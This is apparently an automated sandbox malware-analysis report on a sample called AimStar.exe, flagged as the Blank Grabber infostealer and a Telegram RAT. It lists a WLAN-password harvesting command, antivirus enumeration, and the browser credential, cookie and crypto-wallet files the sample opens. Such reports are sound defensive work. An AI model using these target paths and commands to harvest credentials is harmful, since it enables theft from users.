Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F4D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF710F4D080

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F65C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF710F65C70

Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe

Code function: 88_2_00007FF7139948CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

88_2_00007FF7139948CC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AimStar.exe PID: 7284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI72842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: AimStar.exe PID: 7332, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: com.liberty.jaxx
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: exodus.wallet
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: AimStar.exe, 00000002.00000002.2415391587.000002020DAB8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\3e445a25-c088-46bb-968a-82532b92e486	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

